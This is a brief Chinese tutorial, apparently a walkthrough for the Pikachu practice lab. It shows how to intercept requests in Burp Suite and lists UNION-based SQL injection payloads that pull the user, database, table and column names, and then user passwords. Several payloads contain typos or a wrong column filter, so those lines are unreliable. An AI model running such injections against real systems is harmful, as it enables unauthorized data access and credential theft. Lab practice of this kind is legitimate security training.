使用BP拦截,将拦截到的数据包发送到Repeater(右键即可查看)

查询基本信息,Union select user(),database() #   得到用户名(user)和数据库名(database)

Union select user(),database() #  
 得到用户名(user)和数据库名(database)

查询表名

Union selecr 1,table_name from information_schema.tbales where table_schema=’数据库名’#

查询字段名

Union select 1,column_name from information_schema.columns where column_name=’表明’#

查询列

Union select id,password from pikachu.users # 

最后修改:2019 年 04 月 06 日 02 : 32 PM
如果觉得我的文章对你有用,请随意赞赏